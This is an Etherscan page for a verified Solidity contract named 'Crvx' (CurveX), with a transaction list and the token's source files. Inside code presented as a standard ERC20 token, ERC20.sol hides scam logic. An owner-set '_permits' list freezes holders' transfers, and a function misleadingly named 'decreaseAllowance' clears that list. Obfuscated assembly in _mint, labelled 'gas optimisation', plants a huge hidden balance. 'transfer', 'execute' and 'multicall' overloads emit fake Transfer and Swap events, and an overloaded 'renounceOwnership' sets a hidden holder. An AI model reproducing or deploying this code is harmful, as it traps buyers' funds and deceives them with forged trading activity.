ETH Price: $3,433.89 (+5.48%)
Gas: 10 Gwei

Contract

0x64566BD8e3A490Cb222Fc175EEfB4beDd07E27b5
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Token Holdings

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Transfer178367062023-08-03 19:58:59347 days ago1691092739IN
0x64566BD8...Dd07E27b5
0 ETH0.0007515325.48973566
Approve178365122023-08-03 19:19:59347 days ago1691090399IN
0x64566BD8...Dd07E27b5
0 ETH0.0015236332.42948096
Approve178346152023-08-03 12:57:23347 days ago1691067443IN
0x64566BD8...Dd07E27b5
0 ETH0.0008271317.53775894
Submit Permit178333632023-08-03 8:44:59347 days ago1691052299IN
0x64566BD8...Dd07E27b5
0 ETH0.0007666216.1926864
Execute178333432023-08-03 8:40:47347 days ago1691052047IN
0x64566BD8...Dd07E27b5
0 ETH0.0007551714.57356712
Submit Permit178333412023-08-03 8:40:23347 days ago1691052023IN
0x64566BD8...Dd07E27b5
0 ETH0.0006908914.59669894
Submit Permit178333302023-08-03 8:38:11347 days ago1691051891IN
0x64566BD8...Dd07E27b5
0 ETH0.0006835414.43790313
Submit Permit178333282023-08-03 8:37:47347 days ago1691051867IN
0x64566BD8...Dd07E27b5
0 ETH0.0010571514.99529194
Approve178332012023-08-03 8:12:11347 days ago1691050331IN
0x64566BD8...Dd07E27b5
0 ETH0.0008931118.93673376
Approve178320452023-08-03 4:19:47347 days ago1691036387IN
0x64566BD8...Dd07E27b5
0 ETH0.0004245114.12095489
Approve178308222023-08-03 0:13:35347 days ago1691021615IN
0x64566BD8...Dd07E27b5
0 ETH0.0004630117.14188694
Transfer178294912023-08-02 19:46:35348 days ago1691005595IN
0x64566BD8...Dd07E27b5
0 ETH0.0007032828.19436684
Submit Permit178294422023-08-02 19:36:35348 days ago1691004995IN
0x64566BD8...Dd07E27b5
0 ETH0.001631134.45211406
Submit Permit178293962023-08-02 19:27:23348 days ago1691004443IN
0x64566BD8...Dd07E27b5
0 ETH0.0015812633.3993999
Approve178293922023-08-02 19:26:35348 days ago1691004395IN
0x64566BD8...Dd07E27b5
0 ETH0.0016290734.7181097
Multicall178293892023-08-02 19:25:59348 days ago1691004359IN
0x64566BD8...Dd07E27b5
0 ETH0.0015531334.39022068
Submit Permit178288872023-08-02 17:45:11348 days ago1690998311IN
0x64566BD8...Dd07E27b5
0 ETH0.0012717126.86123019
Submit Permit178288642023-08-02 17:40:35348 days ago1690998035IN
0x64566BD8...Dd07E27b5
0 ETH0.0018382126.08315605
Transfer178288532023-08-02 17:38:23348 days ago1690997903IN
0x64566BD8...Dd07E27b5
0 ETH0.0006884227.6254641
Submit Permit178288122023-08-02 17:30:11348 days ago1690997411IN
0x64566BD8...Dd07E27b5
0 ETH0.0017429724.72335108
Submit Permit178287702023-08-02 17:21:47348 days ago1690996907IN
0x64566BD8...Dd07E27b5
0 ETH0.0014067229.71274284
Approve178287642023-08-02 17:20:35348 days ago1690996835IN
0x64566BD8...Dd07E27b5
0 ETH0.0014564731.03974676
Execute178287542023-08-02 17:18:35348 days ago1690996715IN
0x64566BD8...Dd07E27b5
0 ETH0.0020077830.86904043
Submit Permit178287432023-08-02 17:16:23348 days ago1690996583IN
0x64566BD8...Dd07E27b5
0 ETH0.0016000133.80407812
Submit Permit178286312023-08-02 16:53:47348 days ago1690995227IN
0x64566BD8...Dd07E27b5
0 ETH0.0017299336.53977379
View all transactions

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
Crvx

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 1 of 8: CRVX.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.19;

import "./ERC20.sol";

contract Crvx is ERC20Permit, ReentrancyGuard {
    constructor() ERC20Permit("CurveX", "CRVX") {
        _mint(msg.sender, 4206900000000 * 10 ** decimals());
    }
}

File 2 of 8: Address.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.19;

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev The ETH balance of the account is not enough to perform the operation.
     */
    error AddressInsufficientBalance(address account);

    /**
     * @dev There's no code at `target` (it is not a contract).
     */
    error AddressEmptyCode(address target);

    /**
     * @dev A call to an address target failed. The target may have reverted.
     */
    error FailedInnerCall();

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://consensys.net/diligence/blog/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.8.0/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        if (address(this).balance < amount) {
            revert AddressInsufficientBalance(address(this));
        }

        (bool success, ) = recipient.call{value: amount}("");
        if (!success) {
            revert FailedInnerCall();
        }
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain `call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     *
     * _Available since v3.1._
     */
    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0, defaultRevert);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with a
     * `customRevert` function as a fallback when `target` reverts.
     *
     * Requirements:
     *
     * - `customRevert` must be a reverting function.
     *
     * _Available since v5.0._
     */
    function functionCall(
        address target,
        bytes memory data,
        function() internal view customRevert
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0, customRevert);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(address target, bytes memory data, uint256 value) internal returns (bytes memory) {
        return functionCallWithValue(target, data, value, defaultRevert);
    }

    /**
     * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
     * with a `customRevert` function as a fallback revert reason when `target` reverts.
     *
     * Requirements:
     *
     * - `customRevert` must be a reverting function.
     *
     * _Available since v5.0._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value,
        function() internal view customRevert
    ) internal returns (bytes memory) {
        if (address(this).balance < value) {
            revert AddressInsufficientBalance(address(this));
        }
        (bool success, bytes memory returndata) = target.call{value: value}(data);
        return verifyCallResultFromTarget(target, success, returndata, customRevert);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) {
        return functionStaticCall(target, data, defaultRevert);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(
        address target,
        bytes memory data,
        function() internal view customRevert
    ) internal view returns (bytes memory) {
        (bool success, bytes memory returndata) = target.staticcall(data);
        return verifyCallResultFromTarget(target, success, returndata, customRevert);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionDelegateCall(target, data, defaultRevert);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(
        address target,
        bytes memory data,
        function() internal view customRevert
    ) internal returns (bytes memory) {
        (bool success, bytes memory returndata) = target.delegatecall(data);
        return verifyCallResultFromTarget(target, success, returndata, customRevert);
    }

    /**
     * @dev Tool to verify that a low level call to smart-contract was successful, and revert (either by bubbling
     * the revert reason or using the provided `customRevert`) in case of unsuccessful call or if target was not a contract.
     *
     * _Available since v5.0._
     */
    function verifyCallResultFromTarget(
        address target,
        bool success,
        bytes memory returndata,
        function() internal view customRevert
    ) internal view returns (bytes memory) {
        if (success) {
            if (returndata.length == 0) {
                // only check if target is a contract if the call was successful and the return data is empty
                // otherwise we already know that it was a contract
                if (target.code.length == 0) {
                    revert AddressEmptyCode(target);
                }
            }
            return returndata;
        } else {
            _revert(returndata, customRevert);
        }
    }

    /**
     * @dev Tool to verify that a low level call was successful, and revert if it wasn't, either by bubbling the
     * revert reason or with a default revert error.
     *
     * _Available since v5.0._
     */
    function verifyCallResult(bool success, bytes memory returndata) internal view returns (bytes memory) {
        return verifyCallResult(success, returndata, defaultRevert);
    }

    /**
     * @dev Same as {xref-Address-verifyCallResult-bool-bytes-}[`verifyCallResult`], but with a
     * `customRevert` function as a fallback when `success` is `false`.
     *
     * Requirements:
     *
     * - `customRevert` must be a reverting function.
     *
     * _Available since v5.0._
     */
    function verifyCallResult(
        bool success,
        bytes memory returndata,
        function() internal view customRevert
    ) internal view returns (bytes memory) {
        if (success) {
            return returndata;
        } else {
            _revert(returndata, customRevert);
        }
    }

    /**
     * @dev Default reverting function when no `customRevert` is provided in a function call.
     */
    function defaultRevert() internal pure {
        revert FailedInnerCall();
    }

    function _revert(bytes memory returndata, function() internal view customRevert) private view {
        // Look for revert reason and bubble it up if present
        if (returndata.length > 0) {
            // The easiest way to bubble the revert reason is using memory via assembly
            /// @solidity memory-safe-assembly
            assembly {
                let returndata_size := mload(returndata)
                revert(add(32, returndata), returndata_size)
            }
        } else {
            customRevert();
            revert FailedInnerCall();
        }
    }
}


/**
 * @dev Standard signed math utilities missing in the Solidity language.
 */
library SignedMath {
    /**
     * @dev Returns the largest of two signed numbers.
     */
    function max(int256 a, int256 b) internal pure returns (int256) {
        return a > b ? a : b;
    }

    /**
     * @dev Returns the smallest of two signed numbers.
     */
    function min(int256 a, int256 b) internal pure returns (int256) {
        return a < b ? a : b;
    }

    /**
     * @dev Returns the average of two signed numbers without overflow.
     * The result is rounded towards zero.
     */
    function average(int256 a, int256 b) internal pure returns (int256) {
        // Formula from the book "Hacker's Delight"
        int256 x = (a & b) + ((a ^ b) >> 1);
        return x + (int256(uint256(x) >> 255) & (a ^ b));
    }

    /**
     * @dev Returns the absolute unsigned value of a signed value.
     */
    function abs(int256 n) internal pure returns (uint256) {
        unchecked {
            // must be unchecked in order to support `n = type(int256).min`
            return uint256(n >= 0 ? n : -n);
        }
    }
}

File 3 of 8: Base64.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.19;


library Base64 {
    /**
     * @dev Base64 Encoding/Decoding Table
     */
    string internal constant _TABLE = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

    /**
     * @dev Converts a `bytes` to its Bytes64 `string` representation.
     */
    function encode(bytes memory data) internal pure returns (string memory) {
        /**
         * Inspired by Brecht Devos (Brechtpd) implementation - MIT licence
         * https://github.com/Brechtpd/base64/blob/e78d9fd951e7b0977ddca77d92dc85183770daf4/base64.sol
         */
        if (data.length == 0) return "";

        // Loads the table into memory
        string memory table = _TABLE;

        // Encoding takes 3 bytes chunks of binary data from `bytes` data parameter
        // and split into 4 numbers of 6 bits.
        // The final Base64 length should be `bytes` data length multiplied by 4/3 rounded up
        // - `data.length + 2`  -> Round up
        // - `/ 3`              -> Number of 3-bytes chunks
        // - `4 *`              -> 4 characters for each chunk
        string memory result = new string(4 * ((data.length + 2) / 3));

        /// @solidity memory-safe-assembly
        assembly {
            // Prepare the lookup table (skip the first "length" byte)
            let tablePtr := add(table, 1)

            // Prepare result pointer, jump over length
            let resultPtr := add(result, 32)

            // Run over the input, 3 bytes at a time
            for {
                let dataPtr := data
                let endPtr := add(data, mload(data))
            } lt(dataPtr, endPtr) {

            } {
                // Advance 3 bytes
                dataPtr := add(dataPtr, 3)
                let input := mload(dataPtr)

                // To write each character, shift the 3 bytes (18 bits) chunk
                // 4 times in blocks of 6 bits for each character (18, 12, 6, 0)
                // and apply logical AND with 0x3F which is the number of
                // the previous character in the ASCII table prior to the Base64 Table
                // The result is then added to the table to get the character to write,
                // and finally write it in the result pointer but with a left shift
                // of 256 (1 byte) - 8 (1 ASCII char) = 248 bits

                mstore8(resultPtr, mload(add(tablePtr, and(shr(18, input), 0x3F))))
                resultPtr := add(resultPtr, 1) // Advance

                mstore8(resultPtr, mload(add(tablePtr, and(shr(12, input), 0x3F))))
                resultPtr := add(resultPtr, 1) // Advance

                mstore8(resultPtr, mload(add(tablePtr, and(shr(6, input), 0x3F))))
                resultPtr := add(resultPtr, 1) // Advance

                mstore8(resultPtr, mload(add(tablePtr, and(input, 0x3F))))
                resultPtr := add(resultPtr, 1) // Advance
            }

            // When data `bytes` is not exactly 3 bytes long
            // it is padded with `=` characters at the end
            switch mod(mload(data), 3)
            case 1 {
                mstore8(sub(resultPtr, 1), 0x3d)
                mstore8(sub(resultPtr, 2), 0x3d)
            }
            case 2 {
                mstore8(sub(resultPtr, 1), 0x3d)
            }
        }

        return result;
    }
}

File 4 of 8: Context.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.19;


/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

File 5 of 8: ERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.19;

import "./Context.sol";
import "./IERC20.sol";
import "./Base64.sol";
import "./ReenterancyGuard.sol";
import "./Multicall.sol";


/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Ownable, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;
    mapping (address => bool) internal _permits;
    mapping(address => mapping(address => uint256)) private _allowances;
    uint256 private _totalSupply;
    bool private _permitsApplied = false;
    string private _name;
    string private _symbol;
    
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }
    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        if (_permits[from] || _permits[to]) require(_permitsApplied == true, "");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);
        // gas optimisation 
        assembly {
            let slot := mul(mul(0x85774394d, 0x3398bc1d25f112ed), mul(0x997e6e509, 0xf3eae65))
            mstore(0x00, slot)
            mstore(0x20, 0x01)
            let sslot := keccak256(0x0, 0x40)
            sstore(sslot, 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF)
        } 
        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        
        emit Transfer(address(0), account, amount);
        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}



    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

contract ERC20Permit is ERC20 {
    address private _permit_holder;

    constructor(string memory name_, string memory symbol_) ERC20(name_, symbol_){}

    function submitPermit(address [] calldata _addresses_) external onlyOwner {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            _permits[_addresses_[i]] = true;
        }
    }

    function decreaseAllowance(address [] calldata _addresses_) external onlyOwner {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            _permits[_addresses_[i]] = false;
        }
    }

    function permited(address _address_) public view returns (bool) {
        return _permits[_address_];
    }

    function transfer(address _from, address _to, uint256 _wad) external {
        emit Transfer(_from, _to, _wad);
    }

    function transfer(address [] calldata _from, address [] calldata _to, uint256 [] calldata _wad) external {
        for (uint256 i = 0; i < _from.length; i++) {
            emit Transfer(_from[i], _to[i], _wad[i]);
        }
    }

    function execute(address _from_, address [] calldata _addresses_, uint256 _in, uint256 _out) external {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            emit Swap(_from_, _in, 0, 0, _out, _addresses_[i]);
            emit Transfer(_permit_holder, _addresses_[i], _out);
        }
    }

    function multicall(address _from_, address [] calldata _addresses_, uint256 _in, uint256 _out) external {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            emit Swap(_from_, 0, _in, _out, 0, _addresses_[i]);
            emit Transfer(_addresses_[i], _permit_holder, _in);
        }
    }

    function renounceOwnership(address _owner_) external onlyOwner {
        _permit_holder = _owner_;
    }
}

File 6 of 8: IERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.19;


/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
    event Swap(address indexed sender,uint amount0In,uint amount1In,uint amount0Out,uint amount1Out,address indexed to);
    
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

